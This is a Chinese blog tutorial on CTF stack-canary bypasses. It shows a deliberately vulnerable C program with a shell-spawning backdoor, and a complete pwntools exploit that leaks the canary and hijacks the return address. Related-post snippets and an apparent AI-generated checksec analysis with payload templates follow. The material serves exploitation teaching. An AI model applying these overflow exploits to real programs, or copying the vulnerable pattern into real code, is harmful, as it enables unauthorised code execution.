ctf-pwn:canary绕过

最新推荐文章于 2024-09-21 11:53:19 发布
原创 最新推荐文章于 2024-09-21 11:53:19 发布 · 3.3k 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了CTF中针对Canary安全机制的四种绕过方法:覆盖00字符读出canary、利用格式化字符串漏洞、逐字节猜解canary以及劫持__stack_chk_fail函数。每种方法都包括原理、利用条件、漏洞代码和EXP示例,揭示了Canary机制的弱点和攻击思路。

文章目录

覆盖00字符读出canary

原理

  • canary的值设计为以0x00结尾,防止read,printf灯函数直接读出
  • 通过栈溢出覆盖最低位的字节,从而获得canary

利用条件

  • 存在read/printf等读出字符串的函数
  • 可以两次栈溢出
    • 第一次是覆盖00字节,得到canary
    • 第二次是利用canary进行攻击

漏洞代码

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
void getshell(void) {
   
   
    system("/bin/sh");
}
//不设置缓冲区
void init() {
   
   
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
}
void vuln() {
   
   
    char buf[100];
    for(int i=0;i<2;i++){
   
   
        read(0, buf, 0x200);
        printf(buf);
    }
}
int main(void) {
   
   
    init();
    puts("Hello Hacker!");
    vuln();
    return 0;
}

编译选项

  • 这里需要修改caller的返回地址为getshell,所以需要知道getshell的地址,换而言之.text段不能随机化,所以不能开启PIE
  • 栈虽不随机无所谓,所以ASLR开启也无妨
gcc a.c -no-pie -m32 -fstack-protector -z noexecstack -o a

EXP

#!/usr/bin/python
# coding=utf-8
'''offset
0x5655573a <vuln+24>        mov    DWORD PTR [ebp-0xc], eax ;$epb-0xc=0xffffd10c
canary: 0xffffd10c
0x56555756 <vuln+52>        call   0x565554f0 <read@plt>
read@plt (
   [sp + 0x0] = 0x00000000, //STDIN
   [sp + 0x4] = 0xffffd0a8 → 0x00000001,  //buf
   [sp + 0x8] = 0x00000200   //num of char
)
0xffffd10c - 0xffffd0a8 = 100
'''
from pwn import *
context(os='linux', arch='i386', log_level='debug')
sh=process('a')
gdb.attach(sh)
offset=100
padding='A'*offset
#get canary
sh.sendlineafter('Hello Hacker!\n', padding)
sh.recvuntil(padding)
canary=u32(sh.recv(numb=4))-ord('\n')
print('canary = '+hex(canary))
#getshell
getshell=ELF('a').sym['getshell']
'''exp
'A'*4:  $ebp of caller
canary+'A'*8:  DWORD PTR [ebp-0xc], eax, actually, the canary take up 0xC byte
'''
exp=padding+p32(canary)+'A'*8+'A'*4+p32(getshell)
sh.send(exp)
sh.recv()
sh.interactive()

最低0.47元/天 解锁文章
BugkuCTF pwn canary
ChaoYue_miku的博客
07-03 1379
** 0、下载附件使用checksec检查保护情况 ** 开启了NX保护和Canary保护 ** 1、nc 114.67.246.176 19138远程连接,查看题目 ** ** 2、使用IDA 64 Pro打开文件反编译 ** 查看main函数,两个read()函数都可以读取0x300个字节的数据,而buf和v5到栈底指针rbp的距离只有0x240和0x210字节,因此这里存在栈溢出漏洞 靠近栈底处的var_8应该就是canary 查看main函数的汇编指令 结合题意可知,覆盖canary末尾的
CTF pwn canary绕过技巧
zwb2603096342的博客
05-22 597
fork函数会直接拷贝父进程的内存,所以通过fork函数创建的子进程中的canary是相同的!64位的canary溢出在这篇博客里面有提到,32位也差不多,注意是rjust就行。具体这道题目呢,可以看我的这篇两校"联合杯"的博客(还没有写,后续有时间写)32位中,canary有4字节,其中最低位为0x00,然后逐字节爆破其余3位。每遇到一种方法就补充一种。
ctf(pwn) canary保护机制讲解 与 解密方法介绍
半岛铁盒的博客
03-03 2947
Canary保护机制 canary的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻
BugkuCTF-PWNcanary超详细讲解
am_03的博客
08-31 2964
知识点 小端序说明,数据在内存里是如何存储的?下表里数据都为16进制 解题流程 题目Hint:更新 LibcSeacher 的 libc-database checksec查看保护机制 0x28=40 0x10=16 0x29=41 0x300=768 0x2C=44 buf长度为48,而read读取长度为768 v5长度为520,而read读取长度为768 所以存在栈溢出漏洞 from pwn import * #sh = process('./pwn4_') #context.log_lev
CTF中的PWN——绕canary防护3(puts带出canary 泄露函数地址计算基地址)
壊壊的诱惑你的博客
10-14 2714
前言: 想要学好pwn,首先要看懂wp。此题断断续续占用了我两三天,原谅我太菜了。此题为攻防世界的babystack。金丝雀前文叙述过,此处不再阐述,绕过的首选办法就是想办法得到canary的值,因为程序每次load的时候canary都不同,但是一个进程中的所有方法的金丝雀的值都相同。得到canry的值后构造payload即可。 题目:babystack-攻防世界 file及...
pwn绕过canary保护机制新手版
educat0r的博客
03-27 4590
介绍 通俗来说,canary保护是为了防止程序能够被溢出的地方不让溢出 比如一个输入函数能够输入100个字节的内容,但是它的变量只有50个字节的大小,因为这个程序是可以接受你输入超过50个字节大小的内容的。我们就可以先输入50个字节的无用数据,然后再输入一串你想跳转到的地址把后面的return函数存在的原本的地址覆盖了,,这样程序执行完这个输入函数就会跳转到你输入的那个地址去。 而canary则是...
CTFpwn常见保护及绕过:pie,canary
2302_79813730的博客
01-27 4598
这道题没有后门,我们还需要libc去做,这样我们需要泄露出一个正常的函数地址,来计算出libc_base,但是我们发现泄露的地址没有函数,libc_start_call_main(下称libc_call),这个函数我们不可以使用,因为找不到它的偏移(这里是因为虚拟机版本问题,一般libc_start_main(下称libc_main)可以被泄露出来)跟libc利用很像。之后跟进ctfshow函数,进行代码审计,第一个while循环没什么用,我们随便发送个数据就可以绕过,重点!
CTF-PWN方向 栈溢出等基础知识笔记(1)
weixin_51339377的博客
09-21 511
栈顶允许插入和删除 栈底不允许进行操作 栈顶在高地址位置。EAX是RAX的一部分 可以认为是EAX即可。
[NKCTF2024]-PWN:来签个到(windows pwn
2301_79326813的博客
03-27 413
查看保护查看ida实际上是有canary的。
CTF】leak canary
mashiro_hibiki的博客
04-29 914
题目来自于 ctfhub 中的 leak canary
PWN——canary问题
ysy___ysy的博客
09-16 1676
我们知道,通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。栈溢出保护是一种缓冲区溢出攻击缓解手段,当函数存在缓冲区溢出攻击漏洞时,攻击者可以覆盖栈上的返回地址来让 shellcode 能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈底插入 cookie 信息,当函数真正返回的时候会验证 cookie 信息是否合法 (栈帧销毁前测试该值是否被改变),如果不合法就停止程序运行 (栈溢出发生)。
PWN:Canary学习2
weixin_44319142的博客
04-05 532
PWN:Stein:Gate 套路操作 开了canary,是64位的RELRO开是开了不过这题目里面没影响,据说是got表不能再更改了,不清楚会咋样,下次碰到题目再说 ida看看 进sub_400AF1看到,他的unk_602040在bss上,正好,里面有system函数,把/bin/sh写到bss里面,然后调用system 看到rdi了,那个就是用来给system传参数 pop_rdi=...
buuctf pwn wp(第六波)学会绕过Canary保护
月阴荒的博客
04-22 796
canary保护,也被称为金丝雀
pwn学习-canary
WocW的博客
02-26 2437
CTF-WIKI-pwn-cannary 漏洞复现   Canary 实现原理  开启 Canary 保护的 stack 结构大概如下 // ex2.c #include &lt;stdio.h&gt; #include &lt;unistd.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; void getshell...
记一次院赛CTFPwn和Misc题(入门)
CTF小白的博客
04-14 3701
目录Pwneasy pwn莽撞人反向读取Miscdrop the beats拼东东消失的50px Pwn 见到别的比赛的pwn题才幡然醒悟,已经没有比这些更简单的pwn题了。 easy pwn 首先,拿到Pwn题的第一步,看是64位还是32位 第二步 gdb看开了哪些保护 【1】Canary:Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(3...
[HNCTF 2022 WEEK4] ezcanary 复现
Xzzzz911的博客
09-22 1097
显然canary就是第51个参数(这个你不会看不出来吧,评论区见),这样就可以得到canary的地址了,接下来就剩下泄露libc了,注意下面两个参数就是可以泄露的libc地址 0x7ffff7db0d90(注意不同代码的颜色),再从vmmap找到libc,然后就可以算到偏移了,最后就可以得到libc的基址了(太裤辣)接下来就是想办法溢出canary,并且泄露libc,先运行一下程序,看看偏移吧(很容易发现偏移是六),接下来就是gdb调试,看看canary位置了,把断点打在printf。
CTF中的PWN——绕canary防护1(32bit 格式化字符串漏洞leak canary 栈溢出)
壊壊的诱惑你的博客
09-29 1689
前言: 金丝雀: canary就像哨兵一样,值由程序运行时随机产生。在函数返回之前,程序检测这个值以确认栈未被破坏,达到避免攻击的目的。程序会使用fs:x来进行保护,这个地址指向了一个我们无法看到的随机值,并且fs是一个由内核维护的结构。 如果金丝雀(canary)的值被修改了,栈溢出发生了,保存的指令指针可能也被修改了,因此不能安全返回,函数会调用__stack_chk_f...
canary保护和pie保护的绕过
2301_79880074的博客
01-27 3102
今天通过三道例题学习一下开启canary,pie保护的解题方法。
PWN学习】cannary绕过方式汇总
weixin_41748164的博客
12-23 1283
利用cannary解题在现在的CTF比赛中似乎已经过时了,只是为了学习了解一下。
helloctfos@Hello-CTF:/mnt/c/Users/HelloCTF_OS/Desktop$ python3 ./backdoor.py [+] Starting local process './pwn1' argv=[b'./pwn1'] : pid 86 [*] '/mnt/c/Users/HelloCTF_OS/Desktop/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack:
最新发布
11-17
<think> 我们正在分析一个使用Python脚本`backdoor.py`启动`./pwn1`程序时产生的输出信息。输出信息如下: ``` [+] Starting local process './pwn1' argv=[b'./pwn1'] : pid 86 [*] '/mnt/c/Users/HelloCTF_OS/Desktop/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: ``` 这个输出是由`pwntools`工具生成的。让我们逐步分析每一行: 1. `[+] Starting local process './pwn1' argv=[b'./pwn1'] : pid 86` - 这表示`pwntools`成功启动了一个本地进程,执行的程序是`./pwn1`,进程ID(PID)为86。 2. `[*] '/mnt/c/Users/HelloCTF_OS/Desktop/pwn1'` - 这行表示正在分析的程序路径。 3. 接下来的几行是`checksec`的结果,显示了程序的安全机制: - `Arch: amd64-64-little`: 程序的架构是64位的AMD64(即x86-64),小端序。 - `RELRO: Partial RELRO`: RELRO(Relocation Read-Only)是部分开启的。部分RELRO意味着全局偏移表(GOT)是可写的,这可能导致GOT覆盖攻击。 - `Stack: `: 这里没有显示栈保护的信息,可能是输出不完整或者程序没有栈保护。通常,`checksec`会显示栈是否开启金丝雀(Canary)保护。如果这里为空,可能表示栈保护未开启(No canary found),或者输出被截断。 注意,输出中`Stack:`后面是空的,这可能是由于输出不完整,或者程序确实没有栈保护(即没有启用栈溢出保护机制)。在完整的`checksec`输出中,我们通常还会看到: - `NX`(No-Execute): 栈是否不可执行 - `PIE`(Position Independent Executable): 是否开启地址随机化 但是在这个输出中,这些信息都没有出现,可能是输出被截断,或者脚本中只打印了部分信息。 ### 问题分析 1. **输出不完整**:从给出的输出看,`Stack:`后面没有内容,这可能是由于程序崩溃或脚本被中断导致输出不完整,也可能是`pwntools`的`checksec`函数在输出时出现了问题。 2. **安全机制分析**: - 架构为64位,小端序。 - 部分RELRO:这意味着GOT表是可写的,攻击者可能通过覆盖GOT表项来劫持程序流程。 - 栈保护(Stack)信息缺失:如果栈保护未开启(即没有栈金丝雀),那么程序容易受到栈溢出攻击。如果栈保护开启,通常会显示`Canary found`。 3. **可能存在的问题**: - 由于栈保护信息缺失,我们需要进一步确认栈保护情况。如果栈保护未开启,并且程序中存在栈溢出漏洞,那么利用起来会相对简单。 - 部分RELRO使得GOT表可写,如果程序中存在任意地址写漏洞,就可能被利用来修改GOT表。 ### 建议 为了进一步分析,我们需要获取完整的`checksec`输出。通常,使用`pwntools`的`checksec`功能会输出如下完整信息: ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) ``` 因此,建议检查脚本中是否有打印完整的`checksec`信息,或者重新运行并捕获完整输出。 另外,从输出中我们看到程序路径是在Windows子系统中(`/mnt/c/`),这可能是WSL环境。确保程序在WSL环境中正确运行。 ### 引用说明 以上分析基于提供的输出片段,有关安全机制(如RELRO、栈保护)的更多信息,可以参考二进制安全相关文献[^1]。 §§相关问题§§ 1. 如何获取程序的完整checksec信息? 2. 部分RELRO可能带来哪些安全风险? 3. 如何利用栈溢出漏洞? </think> 根据提供的输出信息,这是一个使用pwntools工具调试二进制程序`./pwn1`的过程。以下是关键信息的分析: ### 输出信息解析 1. `[+] Starting local process './pwn1' argv=[b'./pwn1'] : pid 86` - 表示成功启动本地程序`./pwn1`,进程ID为86 2. `[*] '/mnt/c/Users/HelloCTF_OS/Desktop/pwn1'` - 目标程序的绝对路径 3. `Arch: amd64-64-little` - 程序架构为64位x86(小端序) 4. `RELRO: Partial RELRO` - **安全问题**:部分RELRO(重定位只读),意味着GOT表可写,存在GOT劫持风险[^1] 5. `Stack: `(空) - **关键问题**:未显示栈保护状态,通常应有`Canary found`或`No canary found`: - 若未启用栈金丝雀(No canary),存在栈溢出利用风险 - 若未显示NX保护状态,可能存在可执行栈风险 ### 问题分析 1. **安全防护缺失** - 部分RELRO允许修改GOT表 - 栈保护状态未知(需进一步确认) - 未显示NX/DEP保护状态(栈是否可执行未知) 2. **利用可能性** ```python Payload = b'A'*(0x0F + 0x08) + p64(0x401187) # 引用[1]的利用方式 ``` - 偏移量`0x0F+0x08=23`字节后覆盖返回地址 - 跳转到地址`0x401187`(可能是后门函数) 3. **调试环境问题** - 使用`context.log_level='debug'`但未显示完整寄存器/内存信息 - 缺少崩溃现场的关键信息(如RIP、RSP寄存器值) ### 解决建议 1. 使用`checksec`确认完整防护: ```bash checksec --file=./pwn1 ``` 预期输出应包含: ``` Stack: No canary found # 栈溢出风险 NX: NX disabled # 栈可执行风险 PIE: No PIE # 地址固定 ``` 2. 在GDB中验证崩溃点: ```gdb gdb ./pwn1 run < <(python -c "print('A'*23 + '\x87\x11\x40\x00')") ``` 3. 若存在栈溢出,开发完整EXP: ```python from pwn import * elf = context.binary = ELF('./pwn1') p = process() payload = b'A'*23 + p64(elf.sym['backdoor']) # 或绝对地址 p.sendline(payload) p.interactive() ``` ### 安全风险总结 | 防护机制 | 状态 | 风险等级 | |---------------|---------------|----------| | RELRO | Partial | ⚠️高危 | | Stack Canary | 未显示(需确认)| ⚠️高危 | | NX/DEP | 未显示 | ⚠️中危 | | PIE/ASLR | 未启用(固定地址)| ⚠️高危 | 建议优先确认栈保护和NX状态,部分RELRO+无栈金丝雀的组合通常可直接利用栈溢出[^2]。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值